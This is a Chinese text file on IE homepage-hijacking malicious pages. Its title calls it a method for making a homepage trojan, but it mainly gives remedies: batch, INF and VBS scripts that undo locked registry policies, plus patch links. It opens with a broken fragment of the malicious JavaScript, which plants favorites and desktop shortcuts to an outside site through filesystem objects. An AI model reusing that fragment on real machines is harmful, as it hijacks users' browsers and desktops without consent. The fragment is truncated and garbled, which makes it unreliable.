新建 文本文档.txt

主页木马的制作方法

//to add multiple favorites, duplicate the following line, changing the last 2 paramaters. 
AddFavLnk(loc, "【安全测试网】","http://user.netomia.com/wjkplx/"); 
//end add favorites 
//桌面建立快捷键 
var WF, Shor, loc; 
WF = FSO.GetSpecialFolder(0); 
loc = WF + "\\Desktop"; 
if(!FSO.FolderExists(loc)) 
{ 
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Desktop"; 
if(!FSO.FolderExists(loc)) 
{ 
return; 
} 
} 
//end common part 

//the following line is used for adding favorites. 
//to add multiple favorites, duplicate the following line, changing the last 2 paramaters. 
AddFavLnk(loc, "【安全测试网】","http://user.netomia.com/wjkplx/"); 
//桌面建立快捷键结束 

（关闭IE的时候莫名其妙看见自己的桌面上多了一个自己并不想要的东西是什么感觉？） 

} 
catch(e) 
{} 
} 
catch(e) 
{} 
} 

function init() 
{ 
setTimeout("f()", 1000); 
} 

init(); 
很令人讨厌的网页，站长还利用IE错误的MIME头漏洞将一个可执行文件下载到了机器的临时文件夹中，即使修复了系统也无法更改首页。但是，请不要急着从抽屉里翻出windows的CD setup先，真的像站长所说的那样只能通过上他的网站恢复吗？我的回答是：NO！来看一下解决问题的方法。 
1，这个代码没有限制inf文件的使用，那我们可以利用这个方法来解除锁定。但是因为右键被禁止，所以要稍微麻烦一点了。首先建立一个批处理文件，将下面的内容拷入，然后执行这个批处理文件： 
echo off 
echo Windows Registry Editor Version 5.00> c:\hellopc.reg 
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]>> c:\hallopc.reg 
echo "NoViewContextMenu"=dword:00000000>> c:\hellopc.reg 
regedit /s c:\hellopc.reg 
del c:\hellopc.reg 
需要说明的是，我这篇文章中所有针对注册表的编辑都基于win2000，因为现在我的机器里没有win9X（废话），：）所以使用win9X的朋友在使用这些方法时要注意更改“Windows Registry Editor Version 5.00”为“REGEDIT4”。以下不再说明。 
OK，现在右键可以用了，我们可以使用inf文件来解除。这个方法是一位叫charles0718的朋友教我的，试过很好用。先谢谢他。 
新建一个文本文件，打入下列值 
[version] 
signature="$CHICAGO$" 
[DEFAULTINSTALL] 
ADDREG=EDIT.ADD.REG 
DELREG=EDIT.DEL.REG 
[EDIT.ADD.REG] 
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\sys tem 
[EDIT.DEL.REG] 
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\sys tem 
保存文件 
更改扩展名为inf 
右键文件选择安装，重启！现在注册表编辑器就可以使用了，然后就可以针对这个恶意代码更改了的地方逐一改回来。 
2，其实用win9X的朋友批处理文件不如这样写。 
echo off 
echo regedit4> c:\scanreg.reg 
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>> c:\scanreg.reg 
echo "NoRealMode"=dword:00000000>> c:\scanreg.reg 
regedit /s c:\scanreg.reg 
del c:\scanreg.reg 
然后就可以从安装盘里拷一个scanreg.exe来从DOS模式轻松恢复注册表了，这是最简单方便的了。 
下面简单介绍一下Scanreg的用法： 

　　命令格式：Scanreg/＜option＞ 

　　option有以下几个可选项： 

　　？列出Scanreg的使用方法及相关参数的用法。 

　　backup备份注册表及相关的系统文件。 

　　restore选择备份文件进行恢复。 

　　Comment"＜comment＞"给备份文件加上特别的备注。 

　　fix修复注册表。 
3，还是利用批处理文件，不过懒得全写出来了。其实前面只是卖关子嘛，代码都看到了，直接把所有被更改的项目写到这个批处理文件中执行不就OK了吗？呵呵。别骂我。 
4，写一个VBS脚本来恢复注册表。举例如下： 
Dim R 
Set R = CreateObject("WScript.Shell") 
Rem Write Regedit 
R.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", 0, "REG_BINARY" 
R.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\sys tem\DisableRegistryTools", "00000000", "REG_DWORD" 
R.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled", "00000000", "REG_DWORD" 
R.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode", "00000000", "REG_DWORD" 
R.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "", "REG_SZ" 
R.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "", "REG_SZ" 
R.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Window Title", "", "REG_SZ" 
R.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "", "REG_SZ" 
以文件名“Reg.vbs”存盘，后运行该文件。重新启动计算机。 
这样注册表编辑器，运行，命令解释器，DOS实模式等都可以使用了，然后恢复的办法就多了不少了，或者你也可以将所有被更改的DWORD值都加到这个VBS脚本中运行一次即可奏效，只要记住0就是允许，1就是禁止就可以了。我想解决问题的方法肯定还有很多，但是因为对注册表不够了解，所以也想不出来，希望知道的朋友可以教我。我的email是gale@root.com.cn.先谢谢了！ 
另外想说的是，被改了注册表才想着更改是不是太晚了点？其实这些情况都是可以避免的，只要打上微软的补丁就不会有事了。 
WINDOWS 2000用户打上SP2就可以了。 
http://www.microsoft.com/china/windows2000/SP2.htm 
WINDOWS 9X用户 
Internet Explorer 5.01 Service Pack 2. 

http://www.microsoft.com/windows/ie/downloads/recommended/ie501sp2/default.asp 

Internet Explorer 5.5 Service Pack 2. 

http://www.microsoft.com/windows/ie/downloads/recommended/ie55sp2/default.asp